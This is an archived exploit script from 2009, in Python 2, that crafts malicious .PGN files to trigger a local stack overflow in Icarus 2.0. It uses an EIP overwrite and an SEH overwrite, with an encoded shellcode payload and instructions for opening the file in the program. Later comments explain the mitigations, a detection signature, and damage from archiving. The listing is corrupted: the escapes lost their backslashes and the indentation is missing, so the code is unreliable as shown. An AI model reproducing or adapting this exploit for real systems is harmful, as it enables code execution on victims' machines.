# Title : Icarus 2.0 (.PGN File) Local Stack Overflow Exploit (SEH)
# Published : 2009-03-18
# Author : His0k4
#usage: exploit.py
# Banner. These are Python 2 `print` statements (a SyntaxError under Python 3).
# The stray trailing "n" in several strings is almost certainly a `\n` whose
# backslash was dropped when the listing was archived; the same stripping
# affects every "xNN" escape below, so as archived those literals are plain
# ASCII text, not the byte values the inline comments describe.
print "********************************************************************"
print " Icarus 2.0 Local Stack Overflow Exploitn"
print " Download: http://www.randomsoftware.com/pub/icarus.exe"
print " Author : His0k4"
print " Tested on: Windows XP Pro SP2 Frn"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)n"
print " Tip of the day: Klimontayne fe romayne :D"
print "********************************************************************nn"
# --- payload1: plain saved-return-address (EIP) overwrite ------------------
# Layout: 336 bytes of filler ("A"), a 4-byte return address, a 19-byte NOP
# sled, then an encoded payload. The filler length is the distance from the
# start of the overflowing buffer to the saved return address on the stack.
payload1 = "x41" * 336
# Hard-coded address inside kernel32.dll for one specific OS/service-pack
# build. Module base addresses differ between builds, and ASLR makes any
# fixed address unreliable, which is why this variant is so version-bound.
payload1 += "x5Dx38x82x7C" # call esp kernel32.dll (sp2)
payload1 += "x90" * 19 #some nops
# Encoded payload shared by both variants. The leading bytes look like a
# self-decoding stub; what the decoded code does is not shown on this page.
payload1 += "x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x38"
payload1 += "x4exf9x9fx83xebxfcxe2xf4xc4xa6xbdx9fx38x4ex72xda"
payload1 += "x04xc5x85x9ax40x4fx16x14x77x56x72xc0x18x4fx12xd6"
payload1 += "xb3x7ax72x9exd6x7fx39x06x94xcax39xebx3fx8fx33x92"
payload1 += "x39x8cx12x6bx03x1axddx9bx4dxabx72xc0x1cx4fx12xf9"
payload1 += "xb3x42xb2x14x67x52xf8x74xb3x52x72x9exd3xc7xa5xbb"
payload1 += "x3cx8dxc8x5fx5cxc5xb9xafxbdx8ex81x93xb3x0exf5x14"
payload1 += "x48x52x54x14x50x46x12x96xb3xcex49x9fx38x4ex72xf7"
payload1 += "x04x11xc8x69x58x18x70x67xbbx8ex82xcfx50xbex73x9b"
payload1 += "x67x26x61x61xb2x40xaex60xdfx2dx98xf3x5bx4exf9x9f"
# 7000 bytes of 0xCC (the x86 INT3 opcode) appended after the payload so the
# file is large enough to trigger the overflow; under a debugger any stray
# execution landing here halts immediately, which aids triage.
junk = "xCC"*7000
# --- payload2: Structured Exception Handler (SEH) overwrite -----------------
# The bytes below decode to a minimal PGN tag section:
#   [Format "Lecture"]\n[Title "exploit"]\n\n
# so the file passes the parser's initial format check before the oversized
# field is reached. A PGN file whose tag section is followed by hundreds of
# identical bytes is a simple signature for detecting files of this kind.
payload2 = "x5Bx46x6Fx72x6Dx61x74x20x22x4Cx65x63x74x75x72x65x22x5D"
payload2 += "x0Ax5Bx54x69x74x6Cx65x20x22x65x78x70x6Cx6Fx69x74x22x5D"
payload2 += "x0Ax0A"
# 788 bytes of filler reach the SEH record on the stack (nSEH, then handler).
payload2 += "x41"*788
# Overwritten nSEH: a 2-byte short jump forward over the handler pointer,
# padded with two NOPs.
payload2 += "xEBx06x90x90" # jmp +6
# Overwritten handler pointer: a POP/POP/RET sequence that returns into the
# nSEH bytes above. "universal" presumably means the address lies in a module
# that is loaded at the same base on every tested build and is not protected
# by SafeSEH. SafeSEH, SEHOP and DEP are the platform mitigations that defeat
# this technique when the application and OS enable them.
payload2 += "xE9x10x37x01" # universal pop pop ret
# Same encoded payload as payload1.
payload2 += "x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x38"
payload2 += "x4exf9x9fx83xebxfcxe2xf4xc4xa6xbdx9fx38x4ex72xda"
payload2 += "x04xc5x85x9ax40x4fx16x14x77x56x72xc0x18x4fx12xd6"
payload2 += "xb3x7ax72x9exd6x7fx39x06x94xcax39xebx3fx8fx33x92"
payload2 += "x39x8cx12x6bx03x1axddx9bx4dxabx72xc0x1cx4fx12xf9"
payload2 += "xb3x42xb2x14x67x52xf8x74xb3x52x72x9exd3xc7xa5xbb"
payload2 += "x3cx8dxc8x5fx5cxc5xb9xafxbdx8ex81x93xb3x0exf5x14"
payload2 += "x48x52x54x14x50x46x12x96xb3xcex49x9fx38x4ex72xf7"
payload2 += "x04x11xc8x69x58x18x70x67xbbx8ex82xcfx50xbex73x9b"
payload2 += "x67x26x61x61xb2x40xaex60xdfx2dx98xf3x5bx4exf9x9f"
# Trailing 0xCC padding, as for payload1.
payload2 += "xCC"*7000
# Write both files. NOTE(review): the bodies of these try/except blocks carry
# no indentation, so as archived this is an IndentationError; the indent was
# presumably lost alongside the backslashes. The bare `except:` swallows every
# error (including KeyboardInterrupt) and reports only "Error", hiding the
# real cause such as a permissions failure; catching IOError would be the
# narrow, informative choice.
try:
out_file = open("exploit_eip.PGN",'w')
out_file.write(payload1+junk)
out_file.close()
print "Eip exploit File Created!nNow you can run this file directlyn"
except:
print "Error"
try:
out_file = open("exploit_seh.PGN",'w')
out_file.write(payload2)
out_file.close()
print "Seh exploit File Created!nOpen Icarus then game>load and chose exploit_seh.PGNn"
except:
print "Error"